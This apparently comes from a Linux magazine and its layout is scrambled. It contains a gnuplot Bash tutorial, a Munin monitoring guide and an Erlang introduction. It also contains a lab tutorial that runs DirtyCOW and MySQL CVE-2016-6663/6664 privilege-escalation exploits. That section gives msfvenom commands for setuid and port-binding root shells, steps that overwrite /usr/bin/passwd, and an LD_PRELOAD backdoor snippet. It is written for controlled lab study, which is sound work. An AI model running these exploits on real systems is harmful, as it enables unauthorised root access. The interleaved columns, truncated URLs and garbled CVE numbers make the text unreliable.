gnuplot <<ENDOFTHISDOC set terminal wxt plot sin(x), cos(x) ENDOFTHISDOC In Bash, shell scripts containing HERE documents start out via a specified start-up sequence. This set of characters – in the case of our example, we use ENDOFTHISDOC – must be something that does not occur in the actual textual content found inside your document. Instead, it should act as a delimiter on the other side. In the case of our example, the here document consists of the set terminal and plot commands, which get passed into the main gnuplot invocation via the << command. Running the current version of the program leads to unsatisfactory results. The window containing the chart will pop up shortly, only to disappear again afterwards. This stupid behaviour is caused by a little oddity of gnuplot – by default, it removes all chart windows from the screen the moment the main application reaches the end of the script input provided. Fortunately, passing in the -persist parameter allows you to change this behaviour. A working version of our little charting program would look like this:

#!/bin/bash gnuplot -persist <<ENDOFTHISDOC & set terminal wxt plot sin(x), cos(x) ENDOFTHISDOC Run this version of the program to find yourself in front of a diagram showing both sine and cosine – an excellent tool for teaching more about trigonometry.



Linearise me In some cases, transforming a set of values into a function is helpful as it allows the creation of more sophisticated models using the additional data generated from the function. This is a highly mathematical topic, which usually requires dedicated study of its own – O'Reilly's book Mastering Algorithms in C (http://shop. contains a pretty good, understandable discussion of the process of polynomial interpolation.

Bash masterclass


In most cases, the data that needs to be displayed does not take the form of a simple function: it, instead, tends to come as a series of values which must be passed to gnuplot via the corresponding command line functions. Embedding such information into the script is not particularly satisfactory – creating self-modifying shell scripts is an art of its own, which we cannot discuss in the frame of a single story. Fortunately, gnuplot can also take in plotting data from .pub files. Let us demonstrate this by creating a file called datasource.txt, and by populating it with a bit of data taken from the precious metal powerhouse KitCo (data taken from http://

1 2 3 4 5 6 7 8 9 10

1236.45 1267.5 1281.4 1282.35 1283.05 1302.8 1301 1303.75 1288.45 1272

18.59 18.75 18.81 18.26 18.22 18.3 18.07 18.54 18.24 17.76

A cursory look at the structure of the file reveals that we have three columns: in addition to a handling sequence number, we have both the silver and the gold prices for ten consecutive trading days. Displaying this information in a naïve chart can be accomplished with the following bit of code:

#!/bin/bash gnuplot -persist <<ENDOFTHISDOC & set terminal wxt plot 'datasource.txt' using 1:2, 'datasource.txt' using 1:3 with lines ENDOFTHISDOC Here, two things are interesting. First of all, the file name is passed in using the '' moniker to designate the file name in question. Secondarily, we specify which column numbers are used as the two variables. As we plan to create one diagram line with gold and one with silver information, two using commands are used that are tied together using the comma operator. When done, run the program – its output will be similar to the one shown in the figure. This is a common problem in diagrams: if the values to be displayed are of significantly differing ranges, the use of a common axis leads to problems. In the case of our diagram, gold price information looks good while the smaller silver price data gets squashed. Fortunately, fixing the problem is really easy: change the here document in order to force gnuplot to use two independent axes:

#!/bin/bash gnuplot -persist <<ENDOFTHISDOC & set terminal wxt plot 'datasource.txt' using 1:2, 'datasource.txt'


Figure 3

Above One axis cannot be used to display two datasets efficiently if their values differ significantly

using 1:3 with lines ENDOFTHISDOC Our example will yield a diagram showing the two price curves in a somewhat sensible format: sadly, axis information is displayed only for the gold price. A long-term mentor of this author – duly equipped with a PhD in physics from one of the most reputable institutes of Austria – once failed the author of this story for a technicality: his diagrams lacked axis descriptions, and thus were “meaningless”. While this might seem a bit extreme, adding context to diagrams is helpful as it prevents misinterpretation. As one can imagine, this is easily accomplished in gnuplot via the following modifications:

#!/bin/bash gnuplot -persist <<ENDOFTHISDOC & set terminal wxt set ylabel 'Gold' set y2label 'Silver' set xlabel 'Trading days' set y2tics autofreq plot 'datasource.txt' using 1:2 axes x1y1, 'datasource.txt' using 1:3 axes x1y2 with lines ENDOFTHISDOC We start out by using the x- and ylabel commands to assign textual descriptions to the axes. Next, the y2tics attribute is set to autofreq: this instructs gnuplot to find the optimal step values using its internal logic. In addition to that, it also overwrites the default settings: if left to its own devices, gnuplot will display ticks only on the first axis of the diagram. With that, it is time to run our standalone example for one last time. This figure shows what you can expect.

File ahoy!

Displaying diagrams is interesting as long as the shell script is run interactively – if your script is offline, it would be more interesting to create a file which can then be distributed via email or SCP transfer. This can be accomplished by redirecting gnuplot's terminal instance to make it output information into the file rather than to a window shown on the frame buffer. Let's try this by modifying the precious metal charting program – a sharply abridged version omitting the state variable code for brevity looks like this:

Figure 4

Above Creating an unambiguous diagram takes but a few commands

#!/bin/bash gnuplot <<ENDOFTHISDOC & set terminal png set output 'goldchart.png' ... plot 'datasource.txt' using 1:2 axes x1y1 . . . ENDOFTHISDOC This gnuplot invocation differs from the normal ones in that it first sets the Terminal to png, thereby instructing the program to plot to a PNG file. Set output is then used to specify the name of the file that is to be generated, after which commands can be issued. When run, the file containing the shell script will be populated with a graphics file. It can then be forwarded to its final destination using a file transfer command of choice.

Differing data

Now that you have a separate .pub file loaded into the gnuplot at runtime, we can change the program's behaviour in order to put out data collected by the main shell script during its execution. One good example for this would be a plot showing ping times to a server – under an assumption of a permanently working network connection, we could assume the sending of ten packages to be accomplished in about ten seconds. This makes ping an ideal candidate for the final

following bit of data (the numbers are likely to be different):

root@tamhan-thinkpad:~/Desktop/DeadStuff/2016Nov/ AprilBash8# cat pingstore.dat of 50.7 50.3 204 53.5 50.4 51.0 50.9 57.8 50.0 53.0 Fortunately, this problem can be solved via grep. When invoked as shown, the program will limit its output to purely numeric data:

ping -c 10 | awk -F [=\ ] {'print $(NF-1)'} | grep -E "[0-9]" > pingstore.dat With that, but one problem remains: graphing the content of the dat file:

#!/bin/bash ping -c 10 | awk -F [=\ ] {'print $(NF-1)'} | grep -E "[0-9]" > pingstore.dat gnuplot -persist <<ENDOFTHISDOC & plot 'pingstore.dat' with lines ENDOFTHISDOC Our last example is special in that it simply provides gnuplot with the pingstore file and instructs it to use lines for the drawing operation. gnuplot's internal algorithms will proceed to generating a numerical sequence for the X axis, thereby ensuring that the diagram looks great. An entire book has been written about Gnuplot – someone who does a lot of diagramming should definitely spend a bit of

If the values to be displayed are of significantly differing ranges, the use of a common axis leads to problems diagramming application of this tutorial – showing a historical trend of connection reliability over time gives an additional set of meaning to your data. Sadly, the output of ping is not directly usable: gnuplot expects uniform numeric values, and is unlikely to be able to parse the output directly. Piping can solve this problem – the awk utility allows you to cut out parts of texts easily. For example, the following line would cut out the relevant column:

ping -c 10 | awk -F [=\ ] {'print $(NF-1)'} > pingstore.dat When run, the file pingstore.dat for this author will contain the

time with the man page of the product. For the average user, however, the instructions discussed in this story are more than enough. And with that, our trip through the realm of shell scripting has come to an end. Even though we covered an amazing amount of ground, this is, by far, not everything that can be said about shell scripts. Should you find yourself performing any kind of task over and over again, you should definitely consider looking for a shell script to handle it instead – thanks to the openness and chattiness of UNIX administrators, a simple Google search is likely to yield more results than you could have imagined in your wildest dreams.




Analyse, adjust and run exploits in a controlled environment Running exploits out-of-the-box is a perilous business: it can lead to a total system crash

is delivered (at some point and by using different techniques) to the vulnerable application. You can write shellcode from scratch or by using msfvenom, a tool within the Metasploit Framework. WebSecurity Dojo architecture is x86, so let's generate an ELF32 binary that will spawn a new shell. Type this in your Kali Linux terminal:

Toni Castillo Girona

holds a bachelor's degree in Software Engineering and works as an ICT research support expert in a public university sited in Catalonia (Spain). He writes regularly about GNU/Linux in his blog:

msfvenom -p linux/x86/exec -a x86 CMD=/bin/bash PrependSetuid=True -f elf > myshell Try it; copy the file to your WebSecurity Dojo VM:

Above By executing the ptrace-based exploit, we can overwrite /usr/bin/passwd and gain a root shell

Resources WebSecurity Dojo Installation

Kali Linux installation





MySQL CVE-20166663

MySQL CVE-20166664

MySQL system crash video

Quite a few dangerous vulnerabilities have popped out lately, most of them exploitable by means of executing different Proof of Concept (PoC) scripts. Some of them even come with catchy names too (i.e. DirtyCOW). Sometimes these PoCs work out-of-the-box, but sometimes they don't. So if a PoC does not yield the expected result, it does not necessarily mean that it has not affected the system in some way. If you execute an exploit and it does not work, maybe it is because that particular system is either not vulnerable or the PoC needs to be adjusted. Worstcase scenario: the exploit damages the system. This is why you need to analyse what the exploit really does, understand the vulnerability it is based on, and execute it in a controlled environment (i.e. a virtual machine). This tutorial will provide you with a general understanding of exploits by playing with three of the latest ones out there (as of this writing): CVE-2016-5195, CVE-2016-663 and CVE-2016-6664, along with a brief stepby-step guide to shellcode. Exploits are coded in all sorts of programming languages: C, Perl, Python, Rubyâ&#x20AC;Ś Even in Bash. It is a good idea to analyse a particular exploit and then re-code it using your preferred language to prove that you have understood what it does.

Prepare your test lab

First things first: you don't want to go around executing exploits against a real computer! You need to set-up a test lab first. To follow this tutorial, you have to install two virtual machines (VMs): WebSecurity Dojo 2.0 and Kali Linux (See References). Once both VMs are up and running, open a new shell in both VMs and read on!

Generate shellcode

Shellcode is commonly found in exploits. It is machine code that


Ethical hacking

The information in this tutorial is for security testing purposes only. It is illegal to use these techniques on any computer, server or domain that you do not own or have admin responsibility for!

scp myshell dojo@YOUR_DOJO_IP: From within WebSecurity Dojo, you need to type these commands to change the owner and finally set the execution and sticky bits on myshell:

sudo chown root:root myshell sudo chmod 4755 myshell Execute it as user dojo and you will get a new root shell:

./myshell bash-4.2#

Convert the shellcode to a C-char buffer (hex op-codes)

You can tell msfvenom to output the payload using different formats. By using elf as before, you are in fact generating a Linux executable that can be run out-of-the-box. You can play with different formats and see what happens (-f). It is common to embed shellcode inside a PoC script. This PoC can be written in C, Python, or whatever. So you need to adjust the payload format accordingly so it fits nicely within your PoC. Let's imagine you want all the bytes from our previous payload to be converted into a C-char buffer. To do so, type this in WebSecurity Dojo:

xxd -i myshell A byte-by-byte representation of myshell will be outputted as a C-char array along with its length:

unsigned char myshell[] = { 0x7f, 0x45, 0x4c, 0x46, 0x01... }; unsigned int myshell_len = 136;

Convert shellcode to assembly

More often than not you will be using an exploit coded by someone else. This exploit could contain shellcode. You need to understand the shellcode before running it! Go to Kali Linux and generate this new shellcode in C format:

msfvenom -p linux/x86/exec -a x86 CMD=/bin/bash PrependSetuid=True -f c > myshell Now open your favourite ASCII editor and create a new C source file. Write this down (replace the placeholder with the output of the previous command):

#include <stdio.h> <PASTE_THE_SHELL_CODE_HERE> void main(int argc, char **argv) { } Save it as exploit.c. Compile it and then open the binary within a gdb session:

gcc exploit.c -o exploit gdb -q exploit The shellcode will be located at the address pointed to by buf[]. Use the disassemble command in gdb with this particular address to obtain the exploit code:

(gdb) disass &buf 0x0804a040 <+0>: 0x0804a042 <+2>: 0x0804a044 <+4>: 0x0804a045 <+5>: ...

xor push pop int

%ebx,%ebx $0x17 %eax $0x80

Because &buf points to a bunch of op-codes, gdb has no trouble at all in disassembling them!

Overwrite files with DirtyCOW

DirtyCow is a kernel race condition bug that allows any non-

will be able to recover the previous VM state. This PoC will allow you to write a string to a file owned by root for which you have read-only permission. First, create the file and put some text in it:

sudo echo "Root file" > test sudo chmod 0404 test Now, run the exploit:

./dirtyc0w test "HELLO" ... procselfmem -100000000 If you read the file again, you will see that the exploit has failed. Indeed, the contents of test have not been altered at all. The exploit output itself pinpoints where the error could be: procselfmem -100000000. Using your favourite ASCII editor, open the exploit source code and look for the procselfmem string. The code belongs to one of the two threads of the exploit: procselfmemThread:

Looking for SUID root binaries Whenever trying to escalate privileges (as seen in this tutorial), it is common to look for SUID root files that could be used to achieve this goal. You can rely on the old find command to list all the SUID root files in your system. Type this in a new terminal: find / -xdev -user root \( -perm -4000 -o -perm -2000 \).

1 for(i=0;i<100000000;i++){ 2 lseek(f,(uintptr_t) map,SEEK_SET); 3 c+=write(f,str,strlen(str)); 4 } printf("procselfmem %d\n\n", c); The idea behind DirtyCOW is to trigger a race condition between two threads: one calling madvise() and the other writing over and over to the file mapped into the process address space using / proc/self/mem. As the previous output implies, a negative number means that every single call to the write function has failed (line 3). In other words, you are not allowed to write to / proc/self/mem, apparently. However, there is another way to write to a process address space: enter ptrace()! Now let's try the second PoC; download it first:

wget -no-check-certificate https://raw. master/pokemon.c

You need to analyse what the exploit really does and execute it in a controlled environment (VM) privileged user to write to any read-only file (even those that belong to other users, such as root). Therefore, it can lead to privilege escalation by overwriting SUID root binaries. WebSecurity Dojo 2.0 is vulnerable to DirtyCOW. Let's play with this bug; download your first exploit using WebSecurity Dojo:

wget -no-check-certificate https://raw. master/dirtyc0w.c This exploit has been coded in C, therefore you have to compile it:

Compile it:

gcc -pthread pokemon.c -o pokemon Try to overwrite test once again:

./pokemon test HELLO Finally, read the test file and be amazed:

cat test HELLOfile

gcc dirtyc0w.c -o dirtyc0w -pthread Now, take a snapshot of your VM before executing the exploit by pressing right-CTRL+T; this way, if something goes wrong, you

This time it has worked. But why? We were not able to write to / proc/self/mem directly, so the new exploit uses a call to ptrace to achieve the same goal. Instead of having a second thread



Tools for privilege escalation If you have local access to a computer, you can use plenty of tools to look for potentially insecure file permissions (SUID root, world-writable), misconfiguration of some system services, weak passwords, and so on. Go Google their names: LinEnum, unix-privesc-check, Lynisâ&#x20AC;Ś Have fun!


calling write(), we have now a second thread calling ptrace to write each byte at a time (lines 4-6) to the address where a copy of test is mapped:

1 for(i=0;i<10000/l;i++) 2 for(o=0;o<l;o++) 3 for(u=0;u<10000;u++) 4 c+=ptrace(PTRACE_POKETEXT,pid, 5 map+o, 6 *((long*)(argv[2]+o))); The way this exploit is written follows the standard approach for debugging a child process from its parent by means of calling fork() and ptrace(PTRACE_TRACEME) (See References). Exploiting this bug allows us to overwrite files but not to append data to them.

Gain a root shell with DirtyCOW

If you combine what you have learned so far about shellcode with the ptrace technique, you can overwrite any file with shellcode. If the file you are overwriting is SUID root, you will be able to spawn a root shell. Go get the next exploit:

wget -O c0w.c Compile it and execute it:

the shellcode so that we can connect remotely to the server as soon as passwd is executed. Go back to your Kali Linux and generate a new ELF32 binary that will listen on TCP port 8080, spawning a root shell as soon as a connection is made (this is known as port-binding shellcode):

msfvenom -p linux/x86/shell_bind_tcp -a x86 LPORT=8080 -f elf |xxd -i > payload Replace the bytes of the shell_code[] buffer inside c0w.c in WebSecurity Dojo with these new ones. Because the shellcode length is different, don't forget to change sc_len too:

unsigned int sc_len = 162; Recompile the exploit and run it; then execute passwd:

passwd& Go back to your Kali VM and use netcat to connect to WebSecurity Dojo:

nc YOUR_DOJO_IP 8080 You are now connected to the VM remotely. Type the command whoami to find out if you are, indeed, root:

gcc c0w.c -pthread -o c0w ; ./c0w This exploit makes a copy of /usr/bin/passwd to /tmp/bak and then it will overwrite it with the shellcode you have generated using msfvenom. As a result, as soon as any user executes the command passwd, a root shell will be spawned. Try it:

~$ passwd Segmentation fault Oops! Depending on your VM capabilities, you could be presented with a root shell instead of firing a segfault. Why the segfault? Remember that DirtyCOW is a race condition bug. You have two threads running on the same computer. If madvise() finishes before the main process calling ptrace() has written every singe byte of the shellcode to the address where a copy of passwd is located, the ELF file will be corrupted. In this case you have to increase the number of iterations for the madvise() thread:

sudo cp /tmp/bak /usr/bin/passwd ./c0w passwd root@dojo2:/home/dojo# whoami root Change the value for the i variable to something greater, say 900000000 (line 3); re-compile the exploit and try again (don't forget to restore the original passwd file from /tmp/bak):

How to overwrite passwd using a port-binding shellcode

Now that you are comfortable enough with this PoC, let's change


whoami root

Escalate privileges in MySQL

It turns out that WebSecurity Dojo is also vulnerable to the latest MySQL CVEs. Download the first exploit:

wget --no-check-certificate -O 40678.c Install the MySQL client libraries and compile the exploit:

sudo apt-get install libmysqlclient-dev gcc 40678.c -lmysqlclient -I/usr/include/mysql -o 40678 This exploit gains a mysql-suid shell when executed locally on a vulnerable mysql version. In order to exploit it, you need some valid database credentials first. Create a new database user with some privileges on the DVWA database:

mysql -u root -p mysql> use dvwa; mysql> GRANT CREATE,SELECT,INSERT,DROP ON dvwa.* TO attacker@localhost IDENTIFIED BY 'password'; mysql> exit Use these credentials to run the first exploit:

./40678 attacker password localhost dvwa [+] Bingo! Race won (took 4 tries) [+] Spawning the mysql SUID shell now

mysql_suid_shell.MYD-4.2$ You will be presented with a shell; first of all, you should now check that you have obtained a mysql-shell by issuing the whoami command:

mysql_suid_shell.MYD-4.2$ whoami mysql From here you can escalate even more privileges by exploiting either CVE-2016-6662 or CVE-2016-6664. Let's try the second one. Open a new terminal in your WebDojo VM and download the second exploit:

wget --no-check-certificate -O This time it is a shell script written in Bash. You can set its execution bit first:

chmod +x If you execute the script you will get an error:

./ : invalid option

Let's start afresh: stop the service, delete the error log file and finally start MySQL again:

service mysql stop rm -rf /var/log/mysql/error.log service mysql start Execute the second exploit from within the MySQL shell:

mysql_suid_shell.MYD-4.2$ ./ /var/log/ mysql/ error.log â&#x20AC;Ś [+] Waiting for MySQL to re-open the logs/MySQL service restart... Do you want to kill mysqld process to instantly get root? :) ? [y/n] At this point, if you press y and then Enter, the script will perform a killall mysqld, thus making mysqld_safe create a new error.log file from scratch. Because now / var/log/mysql/error.log points to /etc/ (it is a soft link), the error log will be stored in /etc/ preload (this is known as a symlink attack). The exploit iterates until it sees this file, at which point it will try to add the malicious library to it (line 4) and then delete the $ERRORLOG file (line 5):

Fix it with the dos2unix command:

sudo apt-get install dos2unix dos2unix This new technique can gain root access by means of diverting the MySQL error log file to /etc/, then replacing its contents with a malicious library (generated and compiled within the Bash script). This library will then be preloaded by the linker, thus replacing the call to geteuid() with this malicious one:

1 uid_t geteuid(void) { 2 static uid_t (*old_geteuid)(); 3 old_geteuid = dlsym(RTLD_NEXT, "geteuid"); 4 if ( old_geteuid() == 0 ) { 5 chown("$BACKDOORPATH", 0, 0); 6 chmod("$BACKDOORPATH", 04777); 7 } 8 return old_geteuid(); 9} This will make a copy of $BACKDOORPATH (i.e., /bin/bash) with SUID root privileges. For this to work, mysqld_safe must be running. Edit /etc/init/mysql.conf and make sure mysqld_ safe is executed instead of mysqld:

1 2 3 4 5 6 7 8

while :; do sleep 0.1 if [ -f /etc/ ]; then echo $PRIVESCLIB > /etc/ rm -f $ERRORLOG break; fi done

Depending on how fast your VM is, you may or may be not successful in executing this exploit out-of-thebox. The worst-case scenario is the file is temporarily owned by root until mysqld_safe executes chown (thus changing the ownership of /etc/ to mysql). If the exploit tries to overwrite /etc/ it will fail (the exploit is run as mysql). The exploit will continue its execution until its very last line. What we will have by then would be a few MySQL error log entries in /etc/ preload, and because this file is system-wide, every single binary that we try to execute afterwards will complain about not being able to pre-load a bunch of unknown objects. If a privileged user reboots the computer, a total system crash could happen. One way to fix this is by increasing the sleep parameter or by making sure the file has been successfully overwritten before breaking the loop and deleting $ERRORLOG (lines 5-7):

exec /usr/bin/mysqld_safe Finally, edit /etc/mysql/conf.d/mysqld_safe_syslog.cnf and set the path for error.log:


4 5 6 7 8

echo $PRIVESCLIB > /etc/ if [ $? -eq 0 ]; then rm -f $ERRORLOG break; fi




Monitor your network with Munin Learn how to install and configure Munin on a Linux system to monitor network computers

Nitish Tiwari

is a software developer by profession, with a huge interest in Free and Open Source software. As well as serving as community moderator and author for leading FOSS publications, he also helps organisations adopt open source software for their business needs.

Resources Munin http://munin-monitoring. org/

A computer network is not complete without a resourcemonitoring component. While there is no dearth of such monitoring tools, a tried and tested tool is always better than relatively new tools – especially when it comes to network uptime and reliability. In this tutorial we will take a look at one such reliable networked resource monitoring tool called Munin. It lets you easily monitor the performance of not only your computers, but networks, SANs, applications, and various other resources. Written in Perl, Munin is easily extensible and its plugins can be written in any language. You can extend the functionality to monitor specific resources via Munin plugins. Architecturally, Munin has a master/node design where the master connects to all the nodes at regular intervals and asks them for data. The master keeps track of the incoming data and any changes therein and serves this information to the end user via a web based interface. Munin is available for almost all the major Linux distributions, including Debian, Ubuntu, Fedora and Red Hat among others. In this tutorial, we’ll see how to install and get started with Munin, followed by how to configure it in a network. We’ll also take a look at some of the interesting Munin plugins and see how to write your own Munin plugins.



$ sudo apt-get install munin-node

Install Munin

As Munin is based on a master/node architecture, you’ll need to choose the software package to be installed based on the role the machine is going to play. For example, if a machine is going to serve as the master, you need to install the munin-master package on that machine. By master, we mean the machine that is going to collect data from all nodes, and serve the results to the end users. The munin-master runs munin-httpd, a basic webserver that provides the munin web interface on port 4948/tcp. If you’re just starting with Munin or have just a few nodes in your network, it should be enough to install the munin-master on one machine. On all the other machines in the network (that are going to be monitored), you need to install the munin-node package. We have taken Ubuntu 16.04 as the host system for this tutorial. To install the munin-master package, type the following:

$ sudo apt-get install munin Right The Munin monitoring home page on a Munin master system. The top-left corner shows the possible problems in different categories

Similarly, you can install the munin-node package by typing:


Munin master configuration

Once you have both the master and node packages installed on the relevant machines, you’ll need to configure them so that they can talk to each other. Additionally, Munin master needs to have the web server configured to be able to serve network status via webpages. All the configuration files are present in the folder /etc/munin. Let’s first configure Munin master. To start with, open the configuration file like this:

$ cd /etc/munin/ $ sudo nano munin.conf Then look for the lines starting with dbdir. This section defines the directories that store various Munin master files. The dbdir stores all of the rrdfiles containing the actual monitoring information, htmldir stores the images and site files, logdirmaintains the logs, rundir holds the state files, and tmpldir is the location for the HTML templates.

There are a number of situations where you’d like to run munin-node on hosts not directly available to the Munin server

Muninnode for Windows

file we'll be modifying is apache.conf, Munin's Apache configuration file. This file is sym-linked to /etc/apache2/ conf-available/munin.conf, which, in turn, is sym-linked to /etc/apache2/conf-enabled/munin.conf. Open the file to allow editing:

$ sudo nano apace.conf

Uncomment all these folder paths by removing the preceding # sign. Also, be sure to change the htmldir from /var/cache/ munin/www to the actual web directory as per the web server configuration. We have used the path, /var/www/munin. Next, look for the first host tree. It defines how to access and monitor the host machine. It should read:

[localhost.localdomain] address use_node_name yes Change the name of that tree to one that uniquely identifies the server. This is the name that will be displayed in the Munin web interface. Then, you’ll need to add all the nodes you’d like to monitor in one of these formats. For example, add a node’s IPv4 address using this format:

Munin Node for Windows, i.e. munin-node-win32, is a Windows client for the Munin monitoring system. It is written in C++, with most plugins built into the executable. This is different from the standard munin-node client, which only uses external plugins written as shell and Perl scripts. The configuration file munin-node.ini uses the standard INI file format.

At the very top of the file, modify the first line to /var/www/ munin, the same as the htmldir path you specified in munin. conf. Next, look for the Directory section, and change the directory to /var/www/munin. Also comment out the first four lines and then add two new directives so that it reads:

<Directory /var/www/munin> #Order allow,deny #Allow from localhost" \t "_blank" ::1 #Options None Require all granted Options FollowSymLinks SymLinksIfOwnerMatch ……. …….. </Directory>

[] address If you have DNS configured, you can also use the FQDN of the node instead of its IP address.

[] address Munin also supports IPv6, so you can add a node’s IPv6 address in the below format.

[] address 2001:db8::de:caf:bad


Munin master web server configuration Within the same /etc/munin directory, the next

You need to change the last and second-to-last Location sections in a similar manner to finish the configuration. Finally, restart the Apache and munin-node services. You should then be able to access Munin at http://localhost/munin.


Adding nodes

To configure Munin nodes, you’ll need to edit the /etc/ munin/munin-node.conf file. The first step is to allow access to the master, so it can query the node. A Munin node listens on all interfaces by default, but because of restrictive access list, you need to add your master’s IP address for the monitoring to work. The ‘cidr_allow’, ‘cidr_deny’, ‘allow’ and ‘deny’ statements can be used to list the master’s IP address. With cidr_allow you can use the following syntax:





the nodes. To enable tracking via SSH tunneling you need to add a node like this:

[ssh-node] address port 5050 Then establish a SSH connection using the following:

$ ssh -L 5050:localhost:4949 -f -N -i keyfile user@ssh-node This will establish a tunnel between TCP ports 5050 on the calling machine to 4949 on the called machine. It will also send SSH in the background after possibly asking for a passphrase.

cidr_allow Now allow uses regular expression matching against the client IP address:

allow ‘^127.’ allow ‘^$’ The next step in configuring the Munin node is to decide which plugins to use. Once you have decided, just add the plugin file to the directory /etc/munin/plugins. The Munin node runs all plugins present in that directory. Note that Munin has a plug-and-play architecture with no restrictions on how and when a node can be added to the network. So, whenever you need to add a new node to your existing network (that is being monitored by Munin), you can simply install the Munin node using the command mentioned earlier and allow access to the Munin master (using the configuration explained earlier). This will ensure the new node is being monitored by Munin.


Monitor hosts that aren’t directly reachable

There are a number of situations where you’d like to run a Munin node on hosts not directly available to the Munin server. For example, consider a scenario where a UNIX server sits between the Munin server and one or more Munin nodes. The server in between reaches both the Munin server and the Munin node, but the Munin server does not reach the Munin node or vice versa. There are various approaches to handle such scenarios; we’ll look at SSH tunnelling. With SSH tunnelling only one SSH connection is required, even if you need to reach several hosts on the other side. The Munin server can listen to different ports on the localhost interface and track


Munin plugins

A Munin plugin is a simple executable invoked in a command line environment, whose role is to gather a set of facts on a host and present them in a format Munin can use. A plugin is usually called without any arguments. In this circumstance, the plugin returns the data in a key value format. For example, the ‘load’ plugin, which comes as standard with Munin, will output the current system load:

$ munin-run load load.value 0.03 The default directory for plugins is /usr/share/munin/ plugins/. You can activate a plugin by creating a symbolic link in the servicedir (usually /etc/munin/plugins/ for a package installation of Munin) and restarting the Munin node. The Munin installation procedure uses the utility muninnode-configure to check which plugins are suitable for your node and create the links automatically. It is called every time a system configuration changes (services, hardware, etc) on the node and it will adjust the collection of plugins accordingly.


Munin plugin invocation

By default, about a dozen set of plugins are installed and active. In its most common form, a plugin is a small perl program or shell script. The plugins are run by munin-node, and they are invoked when successfully contacted by the munin master. When this happens the munin-node runs each plugin twice – once with the argument config to get graph configuration, and once again with no argument to get graph data. This is how they’re handled in a plugin.


When a plugin is invoked with the config argument it is expected to output configuration information for the graph it supports. This output will consist of a number of attributes divided into two sets – global attributes and another set of data source-specific attributes. You can check out the details at list via this link: reference/plugin.html However, when the node receives a fetch command for a plugin the plugin is invoked without any arguments on the command line and is expected to emit one or more field. value attribute values, one for each thing the plugin observes as defined by the config output. The plotting of graphs may be disabled by the config output.


graph_vlabel load load.label load

Munin alarms

EOM exit 0;; esac printf "load.value " cut -d' ' -f2 /proc/loadavg

Sample Munin plugin

Let’s create a sample Munin plugin. We’ll take the example of the Load Average plugin and write it in shell script. In this plugin we want to be able to track a node’s overall average load. There is a Linux file that has the info: /proc/ loadavg. So, let us first read the file and format the output:

$ cut -d' ' -f1 /proc/loadavg 0.09 Also, Munin wants the value in a more structured form, so let’s structure it further:

# printf "load.value "; cut -d' ' -f2 /proc/ loadavg load.value 0.06 Here the load is called the field or field name, the value is the attribute, and the number is the value. The next step is to make sure the plugin accommodates the mandatory requirement of responding with graph-related details when called with the config argument. Minimal output should look like this:


Munin buddyinfo plugin

Linux manages virtual memory on a page granularly. There are some operations, however, which require physically contiguous pages to be allocated by the kernel. Such allocations may possibly fail if the memory gets fragmented, even when there are enough pages free, but they are not contiguous. /proc/buddyinfo helps to visualise free memory fragments on your Linux machine. The Munin buddyinfo plugin can track this info on all the nodes of your network and help you monitor it from the master. This plugin monitors the amount of contiguous areas, called higher order pages. The order means the exponent of two of the size of the area, so order 2 means 2^2 = 4 pages.

Munin has a generic interface for sending warnings and errors. If a Munin plugin discovers that a plugin has a data source breaching its defined limits, Munin is able to alert the administrator either through simple commandline invocations or through using a monitoring system like Nagios or Icinga. Note that if the receiving system can cope with only a limited number of messages at the time, you can use the directive contact. contact.max_ messages.

graph_title Load average graph_vlabel load load.label load This is to make sure that when munin-master gets data from the plugin, it knows how to plot the data in a graph. Here is the final plugin in one file.

#!/bin/sh case $1 in config) cat <<'EOM' graph_title Load average

The plugins are run by munin-node, and invoked when contacted by the munin master


Munin proc plugin

The Munin proc plugin is used to monitor various aspects of named processes. You can configure it by supplying a pipe-delimited list of parameters through environment variables. env.procname defines the processname as seen inside the parenthesis of the second column in /proc/<PID>/ stat. If you don't get the data you expect, you can check if the value is what you expect here. This is used for the first filter. Then args/user-filters is applied on top of this filter. Note that <PID> is the process ID of the process that you are interested in. Process names including non-alphanumeric characters (like space, dash, etc) are Special Process Names. Also, note that if the process name (in env.procname) contains any characters other than [a-zA-Z_], they will be internally replaced by underscores __.



Mihalis Tsoukalos

is a UNIX administrator, a programmer (UNIX & iOS), a DBA and a mathematician. He has been using Linux since 1993. You can reach him at @mactsouk (Twitter) and his website:

Resources An installation of Erlang A text editor such as Emacs or vi


Program in Erlang: Functions

Discover Erlang functions and basic Erlang data types as well as other interesting and helpful Erlang topics This tutorial is the second one in the series of tutorials about the Erlang programming language. The main subject of this tutorial is Erlang data types and functions. As you might remember from the tutorial in the previous issue, all Erlang code comes in modules unless you are experimenting in the Erlang shell; as a result, all Erlang code comes in functions. Erlang has a pretty unusual way of defining functions, especially if you are used to programming languages such as C or Python, which will be explained here. Additionally, as Erlang is a functional programming language, it also supports anonymous functions, which are also going to be illustrated. You will also learn about atoms, lists, maps and tuples, so start reading!

More About Erlang

Tutorial files available:


Concurrency is a central part of Erlang. As a result, Erlang processes, which should not be confused with Linux processes, are lightweight. Put simply, Erlang processes are easy to create, much easier than Linux processes, as they require a very small amount of time and have a small memory overhead. Erlang processes do not communicate with each other using memory, which is a risky thing, but by using messages. Furthermore, as processes are independent, the memory space of each process can be garbage-collected individually. Last, the failure of a process cannot do any damage to other processes, therefore allowing them to continue their jobs.

More About OTP

OTP is a central part of Erlang and the Erlang way of thinking because it allows you to make your Erlang applications highly available. This section will talk a little bit more about OTP in order to get a better understanding of it. OTP is unique among programming languages and allows teams to work and develop distributed, fault-tolerant, scalable and highly available systems. Despite its name (Open Telecom Platform), OTP is domain independent, which means that you can program applications for many different areas. OTP consists of three main parts. These are the Erlang language itself, various tools that come with Erlang, and the design rules, which are generic behaviours and abstract principles that allow you to focus on the logic of the system. The behaviours can be worker processes that do the dirty work, while supervisor processes monitor workers as well as other supervisors. In order to do this right, the developer should structure the processes appropriately. That is enough information about OTP for this tutorial; you will learn even more details about OTP in forthcoming tutorials.

Variables and Numbers

As expected Erlang supports two kinds of numbers, integers and floats. When defining floats, you should always have a number on the left of the decimal point, even if it is zero. If you forget to do so, you will get the following kind of error message:

11> MyFloat = .987. * 1: syntax error before: ',' If the statement is correct, Erlang will reply by printing the float value: 11> MyFloat = 0.987. 0.987 Figure 1 shows an interaction with the Erlang shell where many variables are declared and used. You should pay special attention to the b() function that prints all defined variables and the f() function that clears all the bound variables when executed without any parameters or a specific variable when the variable is given as an argument.

Erlang data types

Erlang supports many data types including atoms, maps, lists and funs. An atom is used for representing a constant value. Atoms have a global scope and start with lowercase letters:

